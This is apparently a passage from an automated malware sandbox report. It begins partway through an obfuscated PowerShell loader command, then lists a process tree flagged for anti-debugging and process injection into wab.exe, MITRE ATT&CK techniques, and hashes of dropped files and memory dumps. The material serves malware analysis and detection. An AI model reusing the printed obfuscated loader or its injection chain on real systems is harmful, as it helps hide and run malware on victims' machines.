sexUdkobtbarmh.,edbrEStddmn folkcAfsttofiskedBindiiEld,rnOgre gScaff]Ponde:Aftal:G,aehATrochSElek CBerolIW,ittIKldni.QuestG P.yteFarvetBje.gSS miht hilrNonsuiBo.arnHospigFrave(Vir.u$ UbetSR,conhR tteaFr msnScoottAppe.u ryptnrequeg He,a)B,sla ');ratlaasene (Concolor 'Kamph$ ind.gOrganlbib loHip,ib couta Kamflemmer:Hir,nL,angvoDe,pekVestua.ntrulSkonsiPleursAnklaeBrne,r PartiBorn n MontgSemim= .egi$KilopSBaglikLumutoTrosfr P etpPaahnePubisd ResteApplisMarty.Ani.as.xcuruGnar,b Texss se,vt,jaktrOutthiReisan.hegegCe la( arad$StagnSAdornwsun,iiFi,zcm M,sksNevusuForumiSpredt cre,dragl$proteDOceani llesftick.fViatoeTrrehrDampbenebulnBestrtTerciiK lopaAvnerlBrystfb drvo V lurColacsF aeltB aavr Len.kBronkeSpirorSuper)Herre ');ratlaasene $Lokalisering;"
    3⤵
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2300
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $"
      4⤵
      PID:4456
  - - C:\Program Files (x86)\windows mail\wab.exe
      "C:\Program Files (x86)\windows mail\wab.exe"
      4⤵
      Modifies system executable filetype association
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Drops file in Program Files directory
      Drops file in Windows directory
      Modifies registry class
      PID:3456

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Privilege Escalation

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE

Filesize
86KB

MD5
0a1704e48ff603332eaac935608d3cf1

SHA1
e138d3d481c054a89b85312bfddd2f8a0baf8c1b

SHA256
d9e02af7b220e25f385c71e0a3be4b83203e0673cc1e56fcf02d3e1f0f3774b6

SHA512
7cec7a7c5542e66e347381e9ab5572b2231ab11dac61d9a76bcb7cbd4bd1e86f8169e7840c2e69f93e686cc1834e52cd6b47817b760ea618139a3de64076314f

Download Submit
C:\Users\Admin\AppData\Local\Temp\3582-490\wab.exe

Filesize
464KB

MD5
72ad21d191b58842334d32a381ea7fa8

SHA1
f7375f09855a7bce9f7a152c75e84aac69caf828

SHA256
87abfab7bf5e213fc9e63c7fa39edfa6452eb5f7fdd668cd370d9cf4ea3ef729

SHA512
78662231c7ce0d03374b69dfd32614786dc5bf0c8ad2baadf2143f42bb03bd378632cc457dc414aa7e3d284674cc9151c39f90d71d9a5dd15dba689b2283386d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tpfj1dp3.uik.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Acetylmethylcarbinol.Ron

Filesize
402KB

MD5
614c0d722be9595dbbdfdbadfa5eed36

SHA1
6b5b83f8047285a0a95976f45457eb634d3149fb

SHA256
20c30e12f74fc4439417990b3f7531d135ba2333c6023f727f3aa3b3b3b33db8

SHA512
c4422a467a8c0b3c02460f5ec37090b11faa15b4a59684c584fbf76f746adfdded29dbb4474b4635b7b5bcc31aa05c48a087cc77096e0ed870dbee7c9df7ee70

Download Submit
memory/2300-39-0x0000000008080000-0x00000000086FA000-memory.dmp

Filesize
6.5MB

Download
memory/2300-42-0x0000000007AA0000-0x0000000007AC2000-memory.dmp

Filesize
136KB

Download
memory/2300-22-0x0000000002FD0000-0x0000000003006000-memory.dmp

Filesize
216KB

Download
memory/2300-23-0x00000000059F0000-0x0000000006018000-memory.dmp

Filesize
6.2MB

Download
memory/2300-24-0x0000000005940000-0x0000000005962000-memory.dmp

Filesize
136KB

Download
memory/2300-25-0x0000000006120000-0x0000000006186000-memory.dmp

Filesize
408KB

Download
memory/2300-26-0x0000000006280000-0x00000000062E6000-memory.dmp

Filesize
408KB

Download
memory/2300-36-0x00000000062F0000-0x0000000006644000-memory.dmp

Filesize
3.3MB

Download
memory/2300-37-0x00000000068E0000-0x00000000068FE000-memory.dmp

Filesize
120KB

Download
memory/2300-38-0x00000000069C0000-0x0000000006A0C000-memory.dmp

Filesize
304KB

Download
memory/2300-45-0x0000000009260000-0x000000000B0BC000-memory.dmp

Filesize
30.4MB

Download
memory/2300-40-0x0000000007A30000-0x0000000007A4A000-memory.dmp

Filesize
104KB

Download
memory/2300-41-0x0000000007B90000-0x0000000007C26000-memory.dmp

Filesize
600KB

Download
memory/2300-43-0x0000000008CB0000-0x0000000009254000-memory.dmp

Filesize
5.6MB

Download
memory/3456-64-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3456-177-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3456-175-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3456-174-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/3456-173-0x0000000001200000-0x0000000002454000-memory.dmp

Filesize
18.3MB

Download
memory/5036-46-0x00007FFBCC860000-0x00007FFBCD321000-memory.dmp

Filesize
10.8MB

Download
memory/5036-11-0x00007FFBCC860000-0x00007FFBCD321000-memory.dmp

Filesize
10.8MB

Download
memory/5036-78-0x00007FFBCC860000-0x00007FFBCD321000-memory.dmp

Filesize
10.8MB

Download
memory/5036-3-0x00000123F1190000-0x00000123F11B2000-memory.dmp

Filesize
136KB

Download
memory/5036-47-0x00007FFBCC863000-0x00007FFBCC865000-memory.dmp

Filesize
8KB

Download
memory/5036-13-0x00007FFBCC860000-0x00007FFBCD321000-memory.dmp

Filesize
10.8MB

Download
memory/5036-0-0x00007FFBCC863000-0x00007FFBCC865000-memory.dmp

Filesize
8KB

Download
memory/5036-12-0x00007FFBCC860000-0x00007FFBCD321000-memory.dmp

Filesize
10.8MB

Download